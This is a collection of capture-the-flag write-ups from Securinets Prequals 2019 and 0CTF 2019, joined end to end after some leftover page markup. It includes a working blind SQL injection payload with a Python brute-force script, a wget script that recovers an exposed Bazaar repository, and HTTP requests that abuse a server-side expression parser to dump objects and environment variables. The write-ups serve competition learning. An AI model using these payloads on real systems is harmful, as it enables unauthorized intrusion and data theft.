<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Securinets Prequals CTF 2019 – Beginner's Luck
* **Category:** Web* **Points:** 989
## Challenge
> Can you help me to win the flag ? I bet you can't ..>> https://web4.ctfsecurinets.com>> [files](https://github.com/m3ssap0/CTF-Writeups/tree/master/Securinets%20Prequals%20CTF%202019/Beginner's%20Luck/files)>> Author:Tr'GFx
## Solution
The website simulates a guessing game where the target is to guess the random token (100 chars) generated for your IP address in order to read the flag.
The challenge gives you some files with the source code.
Analyzing the source code you can discover, into `play.php`, a query vulnerable to SQL injection:
```php$sql = "SELECT * FROM users WHERE ip='" . $_SERVER['REMOTE_ADDR'] . "' AND token='" . $_POST['val'] . "'";$result = $conn->query($sql);```
It can be abused with a payload like the following.
```POST /play.php HTTP/1.1Host: web4.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://web4.ctfsecurinets.com/play.phpContent-Type: application/x-www-form-urlencodedContent-Length: 13Connection: closeCookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxUpgrade-Insecure-Requests: 1
val=' OR ''='```
Nothing is printed to output as result of the query, except for different messages when the query returns rows and when no rows are returned.
These are the prerequisites for a *blind SQL injection*. Data could be exfiltrated, one char at a time, using `LIKE` statement.
The problem is that a limit for the number of the attempts is present (max 10 attempts). At the end of the attempts, the token will be reset. So it's impossible, *from the same IP where the token was generated*, to discover the token.
The solution is obvious: you have to generate the token from one IP, then you have to change the IP to discover the previous generated token.
The query to exfiltrate data is the following.
```sql' OR (ip='x.x.x.x' AND token LIKE '{}%') #```
*Please consider that the specified IP must be the one for which the token was generated, not the attacking one!*
A [Python script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/Securinets%20Prequals%20CTF%202019/Beginner's%20Luck/beginners-luck.py) can be written to discover the token.
```pythonimport timeimport randomimport osimport stringimport requests
token = ""found = len(token)letters = list(string.ascii_lowercase + string.ascii_uppercase + string.digits)letter_candidate = 0payload = "val=' OR (ip='x.x.x.x' AND token LIKE '{}%') #"headers = { "User-Agent": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);", "Content-Type": "application/x-www-form-urlencoded"}url_main = "https://web4.ctfsecurinets.com/"url_index = url_main + "index.php"url_play = url_main + "play.php"url_reset = url_main + "reset.php"url_start = url_main + "start.php"
global_debug = Falsedef debug(page, local_debug): if global_debug and local_debug: print page.status_code print page.headers print page.text
try:
print "[*] Contacting '{}'.".format(url_reset) page = requests.get(url_reset, headers=headers) cookies = {"PHPSESSID": page.cookies["PHPSESSID"]} debug(page, False)
while found < 100:
print "[*] Contacting '{}'.".format(url_index) page = requests.get(url_index, headers=headers, cookies=cookies) debug(page, False)
if "Session Expired" in page.text: print "[*] Session expired, contacting '{}'.".format(url_index) page = requests.get(url_index, headers=headers, cookies=cookies) debug(page, False) elif "Attempt" in page.text: letter = letters[letter_candidate] attempt = token + letter print "[*] Attempt '{}'.".format(attempt) data = payload.format(attempt) print "[*] Payload: {}.".format(data) page = requests.post(url_play, data=data, headers=headers, cookies=cookies) debug(page, False) if "True" in page.text: token += letter found += 1 letter_candidate = 0 print "[*] Correct letter, new token '{}'.".format(token) elif "Better luck next time" in page.text: letter_candidate = letter_candidate + 1 print "[*] Wrong letter." elif "Max Attempts Reahed" in page.text: print "[*] Max attempts reached, contacting '{}'.".format(url_index) page = requests.get(url_index, headers=headers, cookies=cookies) debug(page, False) else: print "[!] Something not working." break
# Go to sleep. sleep_interval = 0 print "[*] Sleeping {} secs.".format(sleep_interval) time.sleep(sleep_interval)
except KeyboardInterrupt: print "[-] Interrupted!"```*(Forgive me, but I wrote this script around 03:00 AM, so it's not the best I can do...)*
At the end the of the process, you can insert the token in the form at the following page. Be sure to use the IP for which the token was generated.
```https://web4.ctfsecurinets.com/flag.php```
The page will give you the flag.
```Securinets{GG_uMadeIT_BLiIiND_M@N}``` |
[Full Writeup](https://github.com/mdsnins/ctf-writeups/blob/master/2019/0ctf%202019/Wallbreaker%20Easy/WallbreakerEasy.md)Sorry for bad English!
Big steps.
1. Upload shared library2. Set LD_PRELOAD, trigger /usr/bin/gs using Imagick to open invalid `.eps` file3. Get a shell! |
# Securinets Prequals CTF 2019 – LOST FLAG
* **Category:** Foren* **Points:** 995
## Challenge
> Help me get back my flag !> > https://web8.ctfsecurinets.com/> > Author: Tr'GFx
## Solution
Connecting to `https://web8.ctfsecurinets.com/.bzr/README` will reveal the presence of a *Bazaar* repository.
A [shell script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/Securinets%20Prequals%20CTF%202019/LOST%20FLAG/lost-flag.sh) can be used to replicate the repository locally.
```bash#!/bin/bash
echo "[*] Creating local repository."mkdir ctf-bzrcd ctf-bzr/bzr initecho 'foo' > foo.txtbzr addbzr commit -m "foo"rm foo.txt
echo "[*] Replacing last-revision file."cd .bzr/branchrm last-revisionwget https://web8.ctfsecurinets.com/.bzr/branch/last-revision
echo "[*] Replacing dirstate file."cd ../checkoutrm dirstatewget https://web8.ctfsecurinets.com/.bzr/checkout/dirstate
echo "[*] Replacing pack-names file."cd ../repositoryrm pack-nameswget https://web8.ctfsecurinets.com/.bzr/repository/pack-names
echo "[*] Using check command to discover missing files."cd indices/rm *.cixrm *.iixrm *.rixrm *.sixrm *.tixcd ../packsrm *.packcd ../../../while true; do CHECK_OUTPUT=$(bzr check 2>&1) if [[ $CHECK_OUTPUT == *"bzr: ERROR: No such file:"* ]]; then MISSING_FILE=$(echo $CHECK_OUTPUT | sed 's/.*\([0-9a-f]\{32\}\).*/\1/') echo "[*] Missing files $MISSING_FILE." declare -a EXTENSIONS=("cix" "iix" "rix" "six" "tix") for EXTENSION in "${EXTENSIONS[@]}"; do TARGET_URL="https://web8.ctfsecurinets.com/.bzr/repository/indices/$MISSING_FILE.$EXTENSION" echo "[*] Downloading $TARGET_URL" wget $TARGET_URL -P .bzr/repository/indices/ done TARGET_URL="https://web8.ctfsecurinets.com/.bzr/repository/packs/$MISSING_FILE.pack" echo "[*] Downloading $TARGET_URL" wget $TARGET_URL -P .bzr/repository/packs/ else echo "[*] Probably all missing files have been downloaded." break fidone
echo "[*] Reverting missing source files."bzr revert
echo "[*] Searching the flag into revisions."R=1while true; do RNEXT=$((R+1)) # Analyzing diff. REVISION=$(bzr diff -r$R..$RNEXT) if [[ $REVISION == "" ]]; then break elif [[ $REVISION == *"flag"* ]]; then echo "[*] ... $R -> $RNEXT" echo $REVISION fi
R=$RNEXTdone```
Analizyng the `admin.php` file, you will discover it included a `flag.php` file that is missing; that file contains a `$flag` variable with the flag.
```phpWelcome Admin</H1>";
echo "Here's your flag:".$flag;
?>```
Hence, via the script, all the history can be analyzed to find that file with the flag.
The flag is the following.
```Securinets{BzzzzzzzzZzzzzzzzzzZrR_roCk$}``` |
# Securinets Prequals CTF 2019 – Sanity Check
* **Category:** -* **Points:** 10
## Challenge
> Join our discord server to get the flag
## Solution
The text tells everything.
```Securinets{PReQu@l$_2K19}``` |
# Securinets Prequals CTF 2019 – HIDDEN
* **Category:** Misc* **Points:** 200
## Challenge
> My friend asked me to find his hidden flag in this link .. Can you help me?>> https://misc1.ctfsecurinets.com/>> Author:Tr'GFx
## Solution
Connecting to the website you will experience a trusting error on the HTTPS certificate.
The website will only print a message: `Flag is somewhere here`.
Examining the certificate, you will find the flag into the issuer information.
```E = [email protected]CN = ctfsecurinets.comO = Securinets{HiDDeN_D@tA_In_S3lF_S3iGnEd_CeRtifICates}L = TunisS = TunisiaC = TN```
The flag is the following.
```Securinets{HiDDeN_D@tA_In_S3lF_S3iGnEd_CeRtifICates}``` |
refrain was a misc task at 0CTF/TCTF Quals 2019 where you had to reconstruct input data from a program trace.
The program executed was `echo -n 'flag{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}' | convert -font Courier text:- image.png`.
Read more: https://blog.bushwhackers.ru/0ctf-2019-quals-refrain/ |
So for this challenge i used [GHIDRA](https://www.ghidra-sre.org/) as many people told me to give it a try.
Now coming to the challenge we have been provided an elf file ([rev.elf](rev.elf)).
On running the file it ask for a PASSWORD.I randomly typed something it says "ACCESS DENIED".
On decompiling the file with GHIDRA i got the main ,you can see the full file here [decompiled file](decompiled.txt).
In the starting of the code there are 3 while loops in which is basically storing data in an array.The loop is as folows (i have made some changes in the variable name of the decompiled code):
There is a line in decompiled code
*(int *)(&DAT_00302140 + ((long)local_2c * 6 + (long)local_28) * 4) = local_24 + 0x41;
which means that there is an array named DAT_00302140 and "* (int * )(&DAT_00302140 + ((long)local_2c * 6 + (long)local_28) * 4)" is equivalent to : DAT_00302140[((local_2c*6) +local_28)*4]=local_24 + 0x41;Continuing to code:
local_24 = 0; local_2c = 0; int arr[200]; //i made this variable substituion for DAT_00302140 in decompiled code while (local_2c < 5) { local_28 = 0; while (local_28 < 5) { if (local_24 == 9) { local_28 = local_28 + -1; } else { arr[((local_2c*6) +local_28)*4]=local_24 + 0x41; } local_24 = local_24 + 1; local_28 = local_28 + 1; } local_2c = local_2c + 1; }
So the array is intitialised now and then moving forward the code asks for the password (varibale name : DAT_003020a0).
i will use inp instead of DAT_003020a0 variable name.
It is now checking if len(inp)== 14 , So our input len should be 14.
Now again we have 3 while loop in the code :
The line :
(*(int *)(&arr + ((long)local_24 * 6 + (long)local_28) * 4)==(int)(char)(&inp)[(long)local_2c])
will be equivalent to:
arr[(local_24 * 6 + local_28)*4]==inp[local_2c] local_20 = 0; local_2c = 0; while( true ) { sVar3 = strlen(inp); if (sVar3 <= (ulong)(long)local_2c) break; char newarr[28];//i will use this for DAT_003021e0 local_24 = 0; while (local_24 < 5) { local_28 = 0; while (local_28 < 5) { if (arr[(local_24 * 6 + local_28)*4]==inp[local_2c]) { newarr[(long)local_20] = (char)local_24 + 'A'; newarr[(long)(local_20 + 1)] = (char)local_28 + '1'; local_20 = local_20 + 2; } local_28 = local_28 + 1; } local_24 = local_24 + 1; } local_2c = local_2c + 1; } local_2c = 0;
So we have out newarr string generated.
Now the while final loop is doing some shift and xor operations.
local_2c = 0; char final[28]; //using this for DAT_00302100 while( true ) { sVar3 = strlen(newarr); if (sVar3 <= (ulong)(long)local_2c) break; bVar1 = (byte)(local_2c >> 0x37); final[(long)local_2c] =newarr[(long)local_2c] ^ ((char)local_2c + (bVar1 >> 6) & 3) - (bVar1 >> 6); local_2c = local_2c + 1; }
Since local_2c can have max value of 28. local_2c>>0x37 will always be 0 and hence bvar1 =0 always.
bvar1>>6 will always be 0. so our new equation will be:
final[local_2c] =newarr[local_2c]^(local_2c & 3)-0;
In the next step this final string in compared with "B0C2A2C6A3A7C5@6B5F0A4G2B5A2" So we have to reverse this string according to the above while loop to find the correct input.
I converted all the code in python and then reversed it.
On running the code the "arr" generated was : [65, 0, 0, 0, 66, 0, 0, 0, 67, 0, 0, 0, 68, 0, 0, 0, 69, 0, 0, 0, 0, 0, 0, 0, 70, 0, 0, 0, 71, 0, 0, 0, 72, 0, 0, 0, 73, 0, 0, 0, 75, 0, 0, 0, 0, 0, 0, 0, 76, 0, 0, 0, 77, 0, 0, 0, 78, 0, 0, 0, 79, 0, 0, 0, 80, 0, 0, 0, 0, 0, 0, 0, 81, 0, 0, 0, 82, 0, 0, 0, 83, 0, 0, 0, 84, 0, 0, 0, 85, 0, 0, 0, 0, 0, 0, 0, 86, 0, 0, 0, 87, 0, 0, 0, 88, 0, 0, 0, 89, 0, 0, 0, 90]
To find the newarr we can write a reverse code (file name : [rev3.py](rev3.py)) :
newarr=['a']*28 final="B0C2A2C6A3A7C5@6B5F0A4G2B5A2" local_2c=0 while( True ): sVar3 = len(newarr) if (sVar3 <=local_2c): break bVar1 =(local_2c >> 0x37) newarr[local_2c]=chr(ord(final[local_2c])+(bVar1 >> 6)^(local_2c+(bVar1 >> 6) & 3)) # final[local_2c]=chr(newarr[local_2c]^(local_2c+(bVar1 >> 6) & 3) - (bVar1 >> 6)) local_2c = local_2c + 1 print(''.join(newarr))
The newarr came out to be B1A1A3A5A2C4C4B5B4D3A5E1B4C1.
Now Since we know "arr" as well as "newarr" we can now find the correct input doing some reversing in the second part of the code.i did the following in python (file name : [rev2.py](rev2.py)).
i=0 arr=[65, 0, 0, 0, 66, 0, 0, 0, 67, 0, 0, 0, 68, 0, 0, 0, 69, 0, 0, 0, 0, 0, 0, 0, 70, 0, 0, 0, 71, 0, 0, 0, 72, 0, 0, 0, 73, 0, 0, 0, 75, 0, 0, 0, 0, 0, 0, 0, 76, 0, 0, 0, 77, 0, 0, 0, 78, 0, 0, 0, 79, 0, 0, 0, 80, 0, 0, 0, 0, 0, 0, 0, 81, 0, 0, 0, 82, 0, 0, 0, 83, 0, 0, 0, 84, 0, 0, 0, 85, 0, 0, 0, 0, 0, 0, 0, 86, 0, 0, 0, 87, 0, 0, 0, 88, 0, 0, 0, 89, 0, 0, 0, 90] password=['a']*14 newarr="B1A1A3A5A2C4C4B5B4D3A5E1B4C1"
while(i<28): for j in range(5): for k in range(5): if((newarr[i] == chr(j+65)) and (newarr[i+1] == chr(k+49))): password[i//2]=chr(arr[(j*6+k)*4]) i+=2 password="".join(password) print(password)
And the password came out to be :
FACEBOOKISEVIL
we have got the password now !!!!!!
It's time to find the flag.
I entered the password and flag came out : 1337_FD_DDLLLKMO_KUWRRRVL_HAHAHA
It was a time consuming task for me as i generally don't do rev questions in my team . |
In this challenge, we get a gzipped file called perf.data and a minimal description of an environment. Googling this reveals that perf.data is a record format of the perf tool, a Linux profiler. Digging further reveals that the record contains Intel Processor Trace information of the command `convert -font Courier text:- image.png`, which renders input from stdin (presumably the flag) and renders it as a PNG image. Intel Processor Trace information contains all the branching encountered in the command. If we install the exact libraries matching the `perf.data` record, run the same `convert` command against a known plaintext, and compare the branching patterns that `perf` sees during rendering each glyph in `libfreetype` of this known run and the challenge's file, we can reconstruct the flag.
[Read more here](https://blog.vero.site/post/refrain) |
XOR key reuse due to badly programmed parallel code.
Full write-up : [https://github.com/rsa-ctf/write-ups/tree/master/2019/confidencectf#crypto---count-me-in](https://github.com/rsa-ctf/write-ups/tree/master/2019/confidencectf#crypto---count-me-in) |
Elements============
TL;DR: WolframAlpha -> [CMA-ES](http://cma.gforge.inria.fr/) -> Bruteforce lower bits
------------
The program receives an input as following:```flag{xxxxxxxxxxxx-xxxxxxxxxxxx-xxxxxxxxxxxx}```where each of the `xxxxxxxxxxxx` are hexadecimal numbers that are casted as floating-point numbers. The input restrictions are as follows:
1. The first number is `391BC2164F0A`2. The three numbers must be side lengths of a triangle, with the last number being the longest side3. The inradius of the triangle must be `1.940035480806554e13` with error range of `1e-5`4. The circumradius of the triangle must be `4.777053952827391e13` with error range of `1e-5`
Our team first used WolframAlpha to find an approximate value for the remaining two sides. This yielded us a solution with error about `1e10`, which is quite a large error. One of our team member managed to optimize the circumradius to an error range of `1e-3` through binary searching by hand, but the inradius was still huge.
It occured to me that finding the appropriate side length can be considered as an **optimization problem**, where the **function we wish to minimize is the sum of absolute error of both the inradius and circumradius**. More specifically, we have floating point error in calculation, so the function must also be considered **noisy**.
As I had [good experiences](https://github.com/leesh3288/Tetris) with such optimization problems with CMA-ES, I proceeded to try it out. The below code uses a [python implementation of CMA-ES](https://github.com/CMA-ES/pycma).
```pythonimport cmafrom math import sqrt
ks = 0x391BC2164F0Akr = 1.940035480806554e13kR = 4.777053952827391e13
def radiusFit(s): v19 = ks*ks + s[0]*s[0] - s[1]*s[1] S_in = 4*ks*ks*s[0]*s[0] - v19*v19 if S_in < 0: return float('inf') S = sqrt(S_in) / 4 cr = 2*S / (ks + s[0] + s[1]) cR = (ks*s[0]*s[1]) / (4*S) distr = (kr - cr) distR = (kR - cR) print(distr, distR) return abs(distr) + abs(distR)
es = cma.CMAEvolutionStrategy([70789268583970.951, 95523433899867.88], 0.2)es.optimize(radiusFit, min_iterations=500)print(es.result_pretty())```
The result immediately yielded a minimizing solution that was only offset from the answer by `1`. I found the final answer by brute-forcing `[-0x100, 0x100]` range of both unknown sides.
```python#!/usr/bin/python3.6
import subprocessfrom multiprocessing.dummy import Pool as ThreadPool
d = [0x391BC2164F0A, 0x4064e4798768, 0x56e0de138176]
DELTARANGE = 0x100
def run(d1): print("solving d1 = {:x}".format(d1)) for d2 in range(-DELTARANGE, DELTARANGE + 1): payload = "flag{" + "{:012x}-{:012x}-{:012x}".format(d[0], d[1] + d1, d[2] + d2) + "}\n" try: s = subprocess.check_output("./Elements", input=bytes(payload, 'ascii')) if len(s) != 0: print(payload) return payload except subprocess.CalledProcessError as e: pass return ""
pool = ThreadPool(8)results = pool.map(run, list(range(-DELTARANGE, DELTARANGE + 1)))pool.close()pool.join()print(''.join(results))```
**FLAG: `flag{391bc2164f0a-4064e4798769-56e0de138176}`** |
# Securinets Prequals CTF 2019 – Trading values
* **Category:** Web* **Points:** 989
## Challenge
> N00B developers are an easy target. Try to exploit the application feature to get the hidden flag.>> https://web1.ctfsecurinets.com/> > Author:TheEmperors
## Solution
The webiste plots some values on a graph. Here the JavaScript of the widget.
```javascript<script>
Highcharts.chart('container', { chart: { type: 'spline', animation: Highcharts.svg, // don't animate in old IE marginRight: 10, events: { load: function () {
// set up the updating of the chart each second var series = this.series[0]; var formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc="; setInterval(function () { $.get( "/default", { "formula": formula, "values":{"v1": "STC","v2":"PLA","v3":"SDF","v4":"OCK"} } ) .done(function( data ) { var x = (new Date()).getTime(), // current time y = parseInt(data); if(y<1000)formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc="; else if(y>1000 && y<10000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8xMDApLXYxLmRyZikvKHYxLmF2ZyowLjMpLSh2Mi5hdmcvKCg0LzMpKnYyLm1kcyt2Mi5kbXEqMTAwKSkrKHYzLnBkaSt2My5wZGkrMy8yKig1KnYzLnJhciktNjkqdjMuZ2RwKSsxLjcqKHY0Lm11bSp2NC5kYWQpKjE2LjUqdjQuYXZn"; else if(y>10000 && y<100000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjEpLXYxLmRyZikvKHYxLmF2ZyowLjgpLSh2Mi5hdmcvKCgxLzIpKnYyLm1kcy0yNC92Mi5kbXEqMTApKSsodjMucGRpLXYzLnBkaSszLzIqKDIvNSp2My5yYXIpLTY2KnYzLmdkcCkqNy41Lyh2NC5tdW0vdjQuZGFkKSo2LjUvdjQuYXZn"; else formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjA2KS12MS5kcmYpLyh2MS5hdmcqMC4yNSkrKHYyLmF2Zy8oKDMvMikvdjIubWRzLTg0L3YyLmRtcSoxOSkpLSh2My5wZGktdjMucGRpKzkvMiooMTIvNyp2My5yYXIpLTY2KnYzLmdkcCkqMC41Lyh2NC5tdW0qKnY0LmRhZCkqMC4zOS92NC5hdmcqKjI="; series.addPoint([x, y], true, true); }); }, 1000); } } },
time: { useUTC: false },
title: { text: 'Live Securinets Trading values' }, xAxis: { type: 'datetime', tickPixelInterval: 300 }, yAxis: { title: { text: 'Value' }, plotLines: [{ value: 0, width: 1, color: '#808080' }] }, tooltip: { headerFormat: '{series.name}', pointFormat: '{point.x:%Y-%m-%d %H:%M:%S}{point.y:.2f}' }, legend: { enabled: false }, exporting: { enabled: false }, series: [{ name: 'Random data', data: (function () { // generate an array of random data var data = [], time = (new Date()).getTime(), i;
for (i = -19; i <= 0; i += 1) { data.push({ x: time + i * 1000, y: Math.random() }); } return data; }()) }]});</script>```
The base64 decoded formulas are the following.
```(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg
(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg
(v1.mpk-v1.drf*(v1.mpk/100)-v1.drf)/(v1.avg*0.3)-(v2.avg/((4/3)*v2.mds+v2.dmq*100))+(v3.pdi+v3.pdi+3/2*(5*v3.rar)-69*v3.gdp)+1.7*(v4.mum*v4.dad)*16.5*v4.avg
(v1.mpk-v1.drf*(v1.mpk/0.1)-v1.drf)/(v1.avg*0.8)-(v2.avg/((1/2)*v2.mds-24/v2.dmq*10))+(v3.pdi-v3.pdi+3/2*(2/5*v3.rar)-66*v3.gdp)*7.5/(v4.mum/v4.dad)*6.5/v4.avg
(v1.mpk-v1.drf*(v1.mpk/0.06)-v1.drf)/(v1.avg*0.25)+(v2.avg/((3/2)/v2.mds-84/v2.dmq*19))-(v3.pdi-v3.pdi+9/2*(12/7*v3.rar)-66*v3.gdp)*0.5/(v4.mum**v4.dad)*0.39/v4.avg**2```
The sent request is a HTTP GET with a base64 encoded formula and a series of values to execute on the server.
```https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values%5Bv1%5D=STC&values%5Bv2%5D=PLA&values%5Bv3%5D=SDF&values%5Bv4%5D=OCK```
URL-decoded values are the following.
```values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK```
The complete request-response process is like the following.
```GET /default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1Host: web1.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.10.3 (Ubuntu)Date: Sun, 24 Mar 2019 09:21:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeCache-Control: private, must-revalidatepragma: no-cacheexpires: -1Content-Length: 15
1023517.4691689```
Encoding a custom operation like `1+1` in base64 (`DQoxKzE=`) and sending as formula, will produce a result.
```GET /default?formula=DQoxKzE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1Host: web1.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.10.3 (Ubuntu)Date: Sun, 24 Mar 2019 09:22:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeCache-Control: private, must-revalidatepragma: no-cacheexpires: -1Content-Length: 1
2```
Passing a random string, like `aaa` in base64 (`YWFh`), will give an interesting error.
```GET /default?formula=YWFh&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1Host: web1.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.10.3 (Ubuntu)Date: Sun, 24 Mar 2019 09:26:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeCache-Control: private, must-revalidatepragma: no-cacheexpires: -1Content-Length: 67
Variable "aaa" is not valid around position 1 for expression `aaa`.```
Hence the formula is executed server side with an expression parser (i.e. https://github.com/symfony/expression-language).
Passing directly the name of the variable, will print all the object, e.g. passing `v1` (`djE=`) will give the following.
```GET /default?formula=djE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1Host: web1.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server ErrorServer: nginx/1.10.3 (Ubuntu)Date: Sun, 24 Mar 2019 09:42:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeContent-Length: 144
object(App\Entity\STC)#233 (4) { ["id":"App\Entity\STC":private]=> NULL ["avg"]=> int(972) ["mpk"]=> int(3) ["drf"]=> int(99)}```
So, values are objects of classes defined in a classpath. Adding a new value `v0`, setting it to `this` and trying to print it, will give you tons of information.
```GET /default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1Host: web1.ctfsecurinets.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1```
Inside the output, you will find the flag into an environment variable.
